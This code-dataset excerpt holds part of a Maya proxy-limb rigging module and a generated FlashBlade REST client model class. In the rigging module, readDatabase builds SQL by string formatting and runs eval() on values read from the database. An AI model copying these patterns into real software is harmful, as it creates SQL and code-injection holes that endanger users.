\n    def writeLimb(self, fileType='json'):\n        ''' Writes limb information out to the specified data structure '''\n        if fileType == 'json':\n            self.toJson()\n        elif fileType == 'db':\n            self.toDatabase()\n        elif fileType == 'shelve':\n            self.toShelve()\n        else:\n            raise ValueError('Invalid file type: \"%s\"' % fileType)\n\n\nclass LimbBuilder(ProxyLimb):\n    ''' Proxy limb creation class '''\n    _limbCounter = {}\n\n    def __init__(self, limbType):\n        '''\n        Constructor method\n\n        Parameters\n        ----------\n        limbType : string\n            Type of limb\n        '''\n        try:\n            self._limbInfo[limbType]\n        except KeyError:\n            raise KeyError('Invalid limb type (\"%s\")' % limbType)\n        # General limb data\n        self.limbType = limbType\n        self._increaseLimbCount(self.limbType)\n        self.limbId = chr(self._limbCounter[self.limbType])\n        self.oj = None\n        self.sao = None\n        self.radius = None\n        self.jointInfo = None\n        # Naming Convention object\n        self.nameObj = mayaNaming.NodeName()\n\n    @classmethod\n    def _increaseLimbCount(cls, limbType):\n        '''\n        Increments the number of limbs created for each limb type\n\n        Parameters\n        ----------\n        limbType : string\n            Limb type to keep count of\n        '''\n        try:\n            cls._limbCounter[limbType] += 1\n        except KeyError:\n            cls._limbCounter[limbType] = 65\n\n    @classmethod\n    def _resetLimbCount(cls, limbType):\n        '''\n        Resets the limb counter on a per limb basis\n\n        Parameters\n        ----------\n        limbType : string\n            Limb type to reset the counter for\n        '''\n        try:\n            cls._limbCounter[limbType] = 65\n        except KeyError:\n            pass\n\n    def readJson(self, fileName=None):\n        '''\n        Gets proxy limb information from a JSON file\n\n        Parameters\n        ----------\n        fileName : {string, None}, optional\n            Name of file to read from. If None, self._jsonFile will be used\n        '''\n        if not fileName:\n            fileName = self._jsonFile\n        with open(fileName, 'r') as plFile:\n            proxyLimb = json.load(plFile)\n        # Update member data\n        self.oj = proxyLimb[self.limbType]['oj']\n        self.sao = proxyLimb[self.limbType]['sao']\n        self.radius = proxyLimb[self.limbType]['radius']\n        self.jointInfo = proxyLimb[self.limbType]['joints']\n\n    def readDatabase(self, fileName=None, autoClose=True):\n        '''\n        Gets proxy limb information from a database\n\n        Parameters\n        ----------\n        fileName : {string, None}, optional\n            Name of file to read from. If None, self._dbFile will be used\n        autoClose : bool, optional\n            Option to auto close the connection to the database when the operation is finished\n        '''\n        if not fileName:\n            fileName = self._dbFile\n        # Get joint information from the database\n        query = ('''\n                 SELECT pj.jointName, pj.translation\n                 FROM ProxyLimbJoints pj\n                 INNER JOIN ProxyLimbs pl ON pj.limbId = pl.limbId\n                 WHERE pl.limbType = \"%s\";\n                 ''' % self.limbType)\n        conn = sqlite3.connect(fileName)\n        cur = conn.cursor()\n        # Get joint names and positions from the database\n        self.jointInfo = {}\n        for row in cur.execute(query):\n            jointName = row[0]\n            position = eval(row[1])\n            self.jointInfo[jointName] = position\n        # Get joint configuration from the database\n        for row in cur.execute('''\n                               SELECT oj, sao, radius FROM ProxyLimbs\n                               WHERE limbType = \"%s\"\n                               ''' % self.limbType):\n            self.oj, self.sao, self.radius = row\n        # Close database connection\n        if autoClose:\n            conn.close()\n\n    def readShelve(self, fileName=None):\n        '''\n        Gets proxy limb information from a shelve file\n\n        Parameters\n        ----------\n        fileName : {string, None}, optional\n            Name of file to read from. 
If None, self._shelveFile will be used\n '''\n if not fileName:\n fileName = self._shelveFile\n openShelve = shelve.open(fileName, 'r')\n limbObj = openShelve[self.limbType]\n self.oj = limbObj.oj\n self.sao = limbObj.sao\n self.radius = limbObj.radius\n self.jointInfo = limbObj.joints\n openShelve.close()\n\n def buildLimb(self, readFrom='json'):\n '''\n Builds a proxy limb\n\n Parameters\n ----------\n readFrom : {'json', 'db', 'shelve'}, optional\n File type to read information from\n Returns\n -------\n list :\n Newly created Nodes\n '''\n # Get joint information\n if readFrom == 'json':\n self.readJson()\n elif readFrom == 'db':\n self.readDatabase()\n else:\n self.readShelve()\n # Create naming conventions\n curveTag = self.nameObj.nodeTags['curve']\n polyTag = self.nameObj.nodeTags['polygon']\n locatorTag = self.nameObj.nodeTags['locator']\n ddmTag = self.nameObj.nodeTags['distanceDimension']\n # Draw the joints\n proxyJoints = []\n for name, pos in sorted(self.jointInfo.items()):\n jntName = self.nameObj.taggedName(name, 'proxyJoint')\n jntName += self.limbId\n newJnt = pm.joint(n=jntName)\n newJnt.setTranslation(pos, 'world')\n proxyJoints.append(newJnt)\n newJnt.setAttr('radius', 0.35)\n # Orient the joints\n worldAxisDirection = self._upDown[self.sao[1:]]\n rigUtils.orientJoints(proxyJoints, self.oj[0], '+',\n self.oj[1], self.sao[0], worldAxisDirection)\n # Create top node\n topNodeName = self.nameObj.taggedName(self.limbType, curveTag)\n topNodeName += self.limbId\n topNode = modRigUtils.Curves().drawCurve('serratedCircle', topNodeName,\n 0.25)\n topNode.getShape().setAttr('overrideEnabled', True)\n topNode.getShape().setAttr('overrideColor', 14)\n rigUtils.matchTransforms(topNode, proxyJoints[0])\n # Create the locator -> joint -> cube hierarchy\n locators = []\n cubes = []\n for i, jnt in enumerate(proxyJoints):\n # Node names\n descriptor = self.nameObj.splitName(jnt.nodeName())['descriptors']\n descriptor = self.nameObj._delimiter.join(descriptor)\n locName = self.nameObj.taggedName(descriptor, locatorTag)\n locName += self.limbId\n cubeName = self.nameObj.taggedName(descriptor, polyTag)\n cubeName += self.limbId\n # Create the locator\n loc = pm.spaceLocator(n=locName)\n loc.setAttr('localScale', (1.250, 1.250, 1.250))\n loc.getShape().setAttr('overrideEnabled', True)\n loc.getShape().setAttr('overrideColor', 16)\n locators.append(loc)\n loc.setParent(topNode)\n rigUtils.matchTransforms(loc, jnt)\n jnt.setParent(loc)\n # Create cubes\n if jnt is not proxyJoints[-1]: \n cube = pm.polyCube(n=cubeName, ch=False)[0]\n cubes.append(cube)\n pm.select('%s.vtx[:]' % cube.nodeName())\n pm.move(0.5, 0.0, 0.0, r=True, os=True)\n rigUtils.matchTransforms(cube, jnt)\n cube.setParent(jnt)\n cube.setScale([1.00, 0.175, 0.175])\n stretchNodes = []\n # Create stretchy behavior\n aim = self._axisVectors[self.oj[0]]\n worldUp = self._worldAlignVectors[self.sao]\n for i, loc in enumerate(locators):\n if loc is not locators[-1]:\n # Node names\n nodeName = loc.nodeName()\n descriptor = self.nameObj.splitName(nodeName)['descriptors']\n descriptor = self.nameObj._delimiter.join(descriptor)\n ddmName = self.nameObj.taggedName(descriptor, ddmTag)\n ddmName += self.limbId\n # Create measure nodes\n ddm = pm.distanceDimension(locators[i], locators[i + 1])\n ddm.getParent().rename(ddmName)\n ddm.getParent().setParent(topNode)\n ddm.getParent().setAttr('visibility', False)\n ddm.connectAttr('distance', '%s.scaleX' % cubes[i])\n stretchNodes.append(ddm.getParent())\n if i > 0:\n # Aim at child node\n 
pm.aimConstraint(loc, proxyJoints[i - 1], aimVector=aim,\n worldUpVector=worldUp, mo=True, w=1.00,\n skip='x')\n # Clean up\n lockOff = ['tx', 'ty', 'tz',\n 'rx', 'ry', 'rz',\n 'sx', 'sy', 'sz', 'visibility']\n for nodeList in [topNode, proxyJoints, locators, cubes, stretchNodes]:\n # lock attributes\n if nodeList not in [locators, topNode]:\n for n in nodeList:\n for attr in lockOff:\n pm.setAttr('%s.%s' % (n.nodeName(), attr), lock=True,\n k=False, cb=False)\n elif nodeList is locators:\n for n in nodeList:\n for attr in lockOff[3:]:\n pm.setAttr('%s.%s' % (n.nodeName(), attr), lock=True,\n k=False, cb=False)\n elif nodeList is topNode:\n for attr in lockOff[6:]:\n pm.setAttr('%s.%s' % (topNode.nodeName(), attr), lock=True,\n k=False, cb=False)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python/maya/rig/modules/ProxyLimbs.py","file_name":"ProxyLimbs.py","file_ext":"py","file_size_in_byte":18317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"158854440","text":"# coding: utf-8\n\n\"\"\"\n FlashBlade REST API\n\n A lightweight client for FlashBlade REST API 2.9, developed by Pure Storage, Inc. (http://www.purestorage.com/).\n\n OpenAPI spec version: 2.9\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re\n\nimport six\nimport typing\n\nfrom ....properties import Property\nif typing.TYPE_CHECKING:\n from pypureclient.flashblade.FB_2_9 import models\n\nclass ObjectStoreAccessPolicy(object):\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'name': 'str',\n 'id': 'str',\n 'enabled': 'bool',\n 'is_local': 'bool',\n 'location': 'FixedReference',\n 'policy_type': 'str',\n 'account': 'FixedReference',\n 'arn': 'str',\n 'created': 'int',\n 'description': 'str',\n 'rules': 'list[PolicyRuleObjectAccess]',\n 'updated': 'int'\n }\n\n attribute_map = {\n 'name': 'name',\n 'id': 'id',\n 'enabled': 'enabled',\n 'is_local': 'is_local',\n 'location': 'location',\n 'policy_type': 'policy_type',\n 'account': 'account',\n 'arn': 'arn',\n 'created': 'created',\n 'description': 'description',\n 'rules': 'rules',\n 'updated': 'updated'\n }\n\n required_args = {\n }\n\n def __init__(\n self,\n name=None, # type: str\n id=None, # type: str\n enabled=None, # type: bool\n is_local=None, # type: bool\n location=None, # type: models.FixedReference\n policy_type=None, # type: str\n account=None, # type: models.FixedReference\n arn=None, # type: str\n created=None, # type: int\n description=None, # type: str\n rules=None, # type: List[models.PolicyRuleObjectAccess]\n updated=None, # type: int\n ):\n \"\"\"\n Keyword args:\n name (str): Name of the object (e.g., a file system or snapshot).\n id (str): A non-modifiable, globally unique ID chosen by the system.\n enabled (bool): If `true`, the policy is enabled. If not specified, defaults to `true`.\n is_local (bool): Whether the policy is defined on the local array.\n location (FixedReference): Reference to the array where the policy is defined.\n policy_type (str): Type of the policy. Valid values are `nfs`, `object-access` and `snapshot`.\n account (FixedReference): Reference of the associated account. If the policy is not associated with an account, all fields in the reference possess `null` values.\n arn (str): Amazon Resource Name of the policy. 
Used when referencing the policy via S3 APIs.\n created (int): Creation timestamp of the object.\n description (str): A description of the policy, optionally specified when the policy is created. Cannot be modified for an existing policy.\n rules (list[PolicyRuleObjectAccess])\n updated (int): The last updated timestamp of the object.\n \"\"\"\n if name is not None:\n self.name = name\n if id is not None:\n self.id = id\n if enabled is not None:\n self.enabled = enabled\n if is_local is not None:\n self.is_local = is_local\n if location is not None:\n self.location = location\n if policy_type is not None:\n self.policy_type = policy_type\n if account is not None:\n self.account = account\n if arn is not None:\n self.arn = arn\n if created is not None:\n self.created = created\n if description is not None:\n self.description = description\n if rules is not None:\n self.rules = rules\n if updated is not None:\n self.updated = updated\n\n def __setattr__(self, key, value):\n if key not in self.attribute_map:\n raise KeyError(\"Invalid key `{}` for `ObjectStoreAccessPolicy`\".format(key))\n self.__dict__[key] = value\n\n def __getattribute__(self, item):\n value = object.__getattribute__(self, item)\n if isinstance(value, Property):\n return None\n else:\n return value\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n if hasattr(self, attr):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(ObjectStoreAccessPolicy, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, ObjectStoreAccessPolicy):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"pypureclient/flashblade/FB_2_9/models/object_store_access_policy.py","file_name":"object_store_access_policy.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}